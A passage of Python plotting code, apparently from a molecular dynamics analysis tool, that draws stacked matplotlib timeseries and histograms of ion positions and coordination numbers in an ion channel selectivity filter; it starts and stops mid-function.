ion_ts_y_flip, s=1, color=colors[color_id]) # Plot 2 - Ion Position Histogram for vals, ion_z in zip(ion_histo_1st[0][traj_id], ion_histo_1st[1][traj_id]): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] diff = (ion_z[1]-ion_z[0])/2.0 ion_z_shifted = [-1*(ion-diff) for ion in ion_z[1:]] vals_scaled = [val/10.0 for val in vals] ax2.plot(vals_scaled, ion_z_shifted) # Plot 3 - D1 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_1st[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d1_1st[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d1_1st[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax3.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 4 - Coordination Histogram #mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d1_1st[0][traj_id], ion_histo_d1_1st[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax4.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 5 - D2 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_1st[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d1_2nd[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d1_2nd[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax5.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 6 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d1_2nd[0][traj_id], ion_histo_d1_2nd[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax6.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 7 - D3 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_1st[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d1_both[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d1_both[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax7.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 8 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d1_both[0][traj_id], ion_histo_d1_both[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax8.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 9 - D1 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_2nd[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d2_1st[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d2_1st[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax9.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 10 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d2_1st[0][traj_id], ion_histo_d2_1st[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax10.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 11 - D2 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_2nd[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d2_2nd[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d2_2nd[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax11.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 12 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d2_2nd[0][traj_id], ion_histo_d2_2nd[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax12.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 13 - D3 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d2_both[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d2_both[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax13.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 14 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d2_both[0][traj_id], ion_histo_d2_both[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax14.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 15 - D1 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d3_1st[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d3_1st[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax15.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 16 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d3_1st[0][traj_id], ion_histo_d3_1st[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax16.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 17 - D2 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d3_2nd[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d3_2nd[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax17.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 18 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d3_2nd[0][traj_id], ion_histo_d3_2nd[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax18.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 19 - D3 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d3_both[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d3_both[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax19.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 20 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d3_both[0][traj_id], ion_histo_d3_both[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax20.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 21 - Ion R Timeseries colors = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] for color_id, ion_id in enumerate(sorted(ion_ts_r[0][traj_id].keys(), reverse=False)): ion_ts_x = ion_ts_r[1][traj_id][ion_id][::data_skip/2] ion_ts_y = ion_ts_r[0][traj_id][ion_id][::data_skip/2] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax21.scatter(ion_ts_x_scale, ion_ts_y_flip, s=1, color=colors[color_id]) # Plot 22 - Ion R Position Histogram for vals, ion_z in zip(ion_histo_r[0][traj_id], ion_histo_r[1][traj_id]): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] diff = (ion_z[1]-ion_z[0])/2.0 ion_z_shifted = [1*(ion-diff) for ion in ion_z[1:]] vals_scaled = [val/20.0 for val in vals] ax22.plot(vals_scaled, ion_z_shifted) ax1.set_ylabel("Axial pos / nm") ax1.set_ylim([-0.5, 1.2]) ax1.set_yticks([x/10.0 for x in range(-4,11,4)]) ax1.set_xlim([-5,max_length+5]) ax1.set_xticks(range(0, int(50*round(max_length/50)), 50)) ax1.yaxis.set_major_locator(MultipleLocator(0.2)) ax1.yaxis.set_minor_locator(MultipleLocator(0.1)) ax1.xaxis.set_major_locator(MultipleLocator(50)) ax1.xaxis.set_minor_locator(MultipleLocator(25)) ax1.set_axisbelow(True) ax1.yaxis.grid(True,'minor') ax1.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax1.xaxis.grid(True,'minor') ax1.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax2.grid(True) ax2.set_xlim([0,1.0]) ax2.set_xticks([x/10.0 for x in range(0,11,2)]) ax3.set_ylabel("1st") ax3.set_yticks(range(0,max_coord+1,2)) ax3.set_ylim([-0.5,max_coord+0.5]) ax3.yaxis.set_major_locator(MultipleLocator(2)) ax3.yaxis.set_minor_locator(MultipleLocator(1)) ax3.xaxis.set_major_locator(MultipleLocator(50)) ax3.xaxis.set_minor_locator(MultipleLocator(25)) ax3.set_axisbelow(True) ax3.yaxis.grid(True,'minor') ax3.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax3.xaxis.grid(True,'minor') ax3.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax4.grid(True) ax5.set_yticks(range(0,max_coord+1,2)) ax5.set_ylim([-0.5,max_coord+0.5]) ax5.yaxis.set_major_locator(MultipleLocator(2)) ax5.yaxis.set_minor_locator(MultipleLocator(1)) ax5.xaxis.set_major_locator(MultipleLocator(50)) ax5.xaxis.set_minor_locator(MultipleLocator(25)) ax5.set_axisbelow(True) ax5.yaxis.grid(True,'minor') ax5.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax5.xaxis.grid(True,'minor') ax5.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax5.set_ylabel("181\n2nd") ax6.grid(True) ax7.set_yticks(range(0,max_coord+1,2)) ax7.set_ylim([-0.5,max_coord+0.5]) ax7.yaxis.set_major_locator(MultipleLocator(2)) ax7.yaxis.set_minor_locator(MultipleLocator(1)) ax7.xaxis.set_major_locator(MultipleLocator(50)) ax7.xaxis.set_minor_locator(MultipleLocator(25)) ax7.set_axisbelow(True) ax7.yaxis.grid(True,'minor') ax7.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax7.xaxis.grid(True,'minor') ax7.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax7.set_ylabel("Bth") ax8.grid(True) ax9.set_yticks(range(0,max_coord+1,2)) ax9.set_ylim([-0.5,max_coord+0.5]) ax9.yaxis.set_major_locator(MultipleLocator(2)) ax9.yaxis.set_minor_locator(MultipleLocator(1)) ax9.xaxis.set_major_locator(MultipleLocator(50)) ax9.xaxis.set_minor_locator(MultipleLocator(25)) ax9.set_axisbelow(True) ax9.yaxis.grid(True,'minor') ax9.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax9.xaxis.grid(True,'minor') ax9.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax9.set_ylabel("1st") ax10.grid(True) ax11.set_yticks(range(0,max_coord+1,2)) ax11.set_ylim([-0.5,max_coord+0.5]) ax11.yaxis.set_major_locator(MultipleLocator(2)) ax11.yaxis.set_minor_locator(MultipleLocator(1)) ax11.xaxis.set_major_locator(MultipleLocator(50)) ax11.xaxis.set_minor_locator(MultipleLocator(25)) ax11.set_axisbelow(True) ax11.yaxis.grid(True,'minor') ax11.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax11.xaxis.grid(True,'minor') ax11.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax11.set_ylabel("178\n2nd") ax12.grid(True) ax13.set_yticks(range(0,max_coord+1,2)) ax13.set_ylim([-0.5,max_coord+0.5]) ax13.yaxis.set_major_locator(MultipleLocator(2)) ax13.yaxis.set_minor_locator(MultipleLocator(1)) ax13.xaxis.set_major_locator(MultipleLocator(50)) ax13.xaxis.set_minor_locator(MultipleLocator(25)) ax13.set_axisbelow(True) ax13.yaxis.grid(True,'minor') ax13.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax13.xaxis.grid(True,'minor') ax13.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax13.set_ylabel("Bth") ax14.grid(True) ax15.set_yticks(range(0,max_coord+1,2)) ax15.set_ylim([-0.5,max_coord+0.5]) ax15.set_ylabel("1st") ax15.yaxis.set_major_locator(MultipleLocator(2)) ax15.yaxis.set_minor_locator(MultipleLocator(1)) ax15.xaxis.set_major_locator(MultipleLocator(50)) ax15.xaxis.set_minor_locator(MultipleLocator(25)) ax15.set_axisbelow(True) ax15.yaxis.grid(True,'minor') ax15.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax15.xaxis.grid(True,'minor') ax15.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax16.grid(True) ax17.set_yticks(range(0,max_coord+1,2)) ax17.set_ylim([-0.5,max_coord+0.5]) ax17.set_ylabel("177\n2nd") ax17.yaxis.set_major_locator(MultipleLocator(2)) ax17.yaxis.set_minor_locator(MultipleLocator(1)) ax17.xaxis.set_major_locator(MultipleLocator(50)) ax17.xaxis.set_minor_locator(MultipleLocator(25)) ax17.set_axisbelow(True) ax17.yaxis.grid(True,'minor') ax17.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax17.xaxis.grid(True,'minor') ax17.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax18.grid(True) ax19.set_yticks(range(0,max_coord+1,2)) ax19.set_ylim([-0.5,max_coord+0.5]) ax19.set_ylabel("Bth") ax19.yaxis.set_major_locator(MultipleLocator(2)) ax19.yaxis.set_minor_locator(MultipleLocator(1)) ax19.xaxis.set_major_locator(MultipleLocator(50)) ax19.xaxis.set_minor_locator(MultipleLocator(25)) ax19.set_axisbelow(True) ax19.yaxis.grid(True,'minor') ax19.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax19.xaxis.grid(True,'minor') ax19.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax20.grid(True) ax21.set_ylabel("R / nm") ax21.yaxis.set_major_locator(MultipleLocator(0.2)) ax21.yaxis.set_minor_locator(MultipleLocator(0.1)) ax21.xaxis.set_major_locator(MultipleLocator(50)) ax21.xaxis.set_minor_locator(MultipleLocator(25)) ax21.set_axisbelow(True) ax21.yaxis.grid(True,'minor') ax21.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax21.xaxis.grid(True,'minor') ax21.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax21.set_ylim([0, 0.6]) ax21.set_yticks([x/100.0 for x in range(0,50,20)]) ax21.set_xlabel("Time / ns") ax22.grid(True) ax22.xaxis.set_major_formatter(FormatStrFormatter('%.1f')) plt.subplots_adjust(hspace = 0.1, wspace = 0.02, left = 0.1, bottom = 0.08, right = 0.95, top = 0.93) plt.suptitle(plot_title+" - Traj "+str(traj_id)) if prefix != None: plt.savefig(prefix+"_"+str(traj_id)+".pdf") else: plt.show() plt.close() return True # This plots a stacked timeseries of trajectory properties in the main column # and histograms of this data in a second column. Sorry for the god-awful # number of arguments... def plot_sf_w_4res_timeseries(channel_occ, channel_counts, ion_ts_1st, ion_histo_1st, ion_ts_2nd, ion_histo_2nd, ion_ts_both, ion_histo_both, ion_ts_d1_1st, ion_histo_d1_1st, ion_ts_d2_1st, ion_histo_d2_1st, ion_ts_d3_1st, ion_histo_d3_1st, ion_ts_l_1st, ion_histo_l_1st, ion_ts_d1_2nd, ion_histo_d1_2nd, ion_ts_d2_2nd, ion_histo_d2_2nd, ion_ts_d3_2nd, ion_histo_d3_2nd, ion_ts_l_2nd, ion_histo_l_2nd, ion_ts_d1_both, ion_histo_d1_both, ion_ts_d2_both, ion_histo_d2_both, ion_ts_d3_both, ion_histo_d3_both, ion_ts_l_both, ion_histo_l_both, time_conv=0.02, prefix=None, plot_title="Stacked Timeseries", max_coord=5, max_length=500, data_skip=10, hist_scale=0.4): # This iterates over all the trajectory id's that you computed data for. # ion_timeseries[0] is the time values array, but any index would suffice. for traj_id in ion_ts_1st[0].keys(): fig = plt.figure() # The grid is a 2 column figure, with 2 + 6 rows. gs = gridspec.GridSpec(13, 2, width_ratios=[4,1], height_ratios=[4,1,1,1,1,1,1,1,1,1,1,1,1]) mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] # Here we initialize all our subplots on the grid defined above. ax1 = plt.subplot(gs[0]) ax2 = plt.subplot(gs[1], sharey = ax1) ax3 = plt.subplot(gs[2], sharex = ax1) ax4 = plt.subplot(gs[3], sharey = ax3, sharex = ax2) ax5 = plt.subplot(gs[4], sharex = ax1) ax6 = plt.subplot(gs[5], sharey = ax3, sharex = ax2) ax7 = plt.subplot(gs[6], sharex = ax1) ax8 = plt.subplot(gs[7], sharey = ax3, sharex = ax2) ax9 = plt.subplot(gs[8], sharex = ax1) ax10 = plt.subplot(gs[9], sharey = ax3, sharex = ax2) ax11 = plt.subplot(gs[10], sharex = ax1) ax12 = plt.subplot(gs[11], sharey = ax3, sharex = ax2) ax13 = plt.subplot(gs[12], sharex = ax1) ax14 = plt.subplot(gs[13], sharey = ax3, sharex = ax2) ax15 = plt.subplot(gs[14], sharex = ax1) ax16 = plt.subplot(gs[15], sharey = ax3, sharex = ax2) ax17 = plt.subplot(gs[16], sharex = ax1) ax18 = plt.subplot(gs[17], sharey = ax3, sharex = ax2) ax19 = plt.subplot(gs[18], sharex = ax1) ax20 = plt.subplot(gs[19], sharey = ax3, sharex = ax2) ax21 = plt.subplot(gs[20], sharex = ax1) ax22 = plt.subplot(gs[21], sharey = ax3, sharex = ax2) ax23 = plt.subplot(gs[22], sharex = ax1) ax24 = plt.subplot(gs[23], sharey = ax3, sharex = ax2) ax25 = plt.subplot(gs[24], sharex = ax1) ax26 = plt.subplot(gs[25], sharey = ax3, sharex = ax2) # Many axis are removed. plt.setp(ax1.get_xticklabels(), visible=False) plt.setp(ax2.get_xticklabels(), visible=False) plt.setp(ax2.get_yticklabels(), visible=False) plt.setp(ax3.get_xticklabels(), visible=False) plt.setp(ax4.get_yticklabels(), visible=False) plt.setp(ax4.get_xticklabels(), visible=False) plt.setp(ax5.get_xticklabels(), visible=False) plt.setp(ax6.get_yticklabels(), visible=False) plt.setp(ax6.get_xticklabels(), visible=False) plt.setp(ax7.get_xticklabels(), visible=False) plt.setp(ax8.get_yticklabels(), visible=False) plt.setp(ax8.get_xticklabels(), visible=False) plt.setp(ax9.get_xticklabels(), visible=False) plt.setp(ax10.get_yticklabels(), visible=False) plt.setp(ax10.get_xticklabels(), visible=False) plt.setp(ax11.get_xticklabels(), visible=False) plt.setp(ax12.get_yticklabels(), visible=False) plt.setp(ax12.get_xticklabels(), visible=False) plt.setp(ax13.get_xticklabels(), visible=False) plt.setp(ax14.get_yticklabels(), visible=False) plt.setp(ax14.get_xticklabels(), visible=False) plt.setp(ax15.get_xticklabels(), visible=False) plt.setp(ax16.get_yticklabels(), visible=False) plt.setp(ax16.get_xticklabels(), visible=False) plt.setp(ax18.get_xticklabels(), visible=False) plt.setp(ax18.get_yticklabels(), visible=False) plt.setp(ax19.get_xticklabels(), visible=False) plt.setp(ax20.get_xticklabels(), visible=False) plt.setp(ax20.get_yticklabels(), visible=False) plt.setp(ax21.get_xticklabels(), visible=False) plt.setp(ax22.get_xticklabels(), visible=False) plt.setp(ax22.get_yticklabels(), visible=False) plt.setp(ax23.get_xticklabels(), visible=False) plt.setp(ax24.get_xticklabels(), visible=False) plt.setp(ax24.get_yticklabels(), visible=False) plt.setp(ax26.get_xticklabels(), visible=False) plt.setp(ax26.get_yticklabels(), visible=False) # Plot 1 - Ion Timeseries colors = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] for color_id, ion_id in enumerate(sorted(ion_ts_1st[0][traj_id].keys(), reverse=False)): ion_ts_x = ion_ts_1st[1][traj_id][ion_id][::int(data_skip/2)] ion_ts_y = ion_ts_1st[0][traj_id][ion_id][::int(data_skip/2)] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [-1*pos for pos in ion_ts_y] ax1.scatter(ion_ts_x_scale, ion_ts_y_flip, s=1, color=colors[color_id]) # Plot 2 - Ion Position Histogram for vals, ion_z in zip(ion_histo_1st[0][traj_id], ion_histo_1st[1][traj_id]): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] diff = (ion_z[1]-ion_z[0])/2.0 ion_z_shifted = [-1*(ion-diff) for ion in ion_z[1:]] vals_scaled = [val/10.0 for val in vals] ax2.plot(vals_scaled, ion_z_shifted) # Plot 3 - D1 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_1st[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d1_1st[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d1_1st[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax3.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 4 - Coordination Histogram #mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d1_1st[0][traj_id], ion_histo_d1_1st[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax4.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 5 - D2 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_1st[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d1_2nd[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d1_2nd[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax5.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 6 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d1_2nd[0][traj_id], ion_histo_d1_2nd[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax6.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 7 - D3 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_1st[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d1_both[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d1_both[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax7.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 8 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d1_both[0][traj_id], ion_histo_d1_both[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax8.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 9 - D1 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_2nd[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d2_1st[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d2_1st[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax9.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 10 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d2_1st[0][traj_id], ion_histo_d2_1st[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax10.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 11 - D2 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_2nd[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d2_2nd[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d2_2nd[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax11.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 12 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d2_2nd[0][traj_id], ion_histo_d2_2nd[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax12.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 13 - D3 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d2_both[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d2_both[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax13.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 14 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d2_both[0][traj_id], ion_histo_d2_both[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax14.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 15 - D1 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d3_1st[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d3_1st[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax15.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 16 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d3_1st[0][traj_id], ion_histo_d3_1st[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax16.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 17 - D2 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_d3_2nd[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_d3_2nd[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax17.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 18 - Coordination Histogram left = 0 for color_id, hist_data in enumerate(zip(ion_histo_d3_2nd[0][traj_id], ion_histo_d3_2nd[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax18.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 19 - D3 Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = 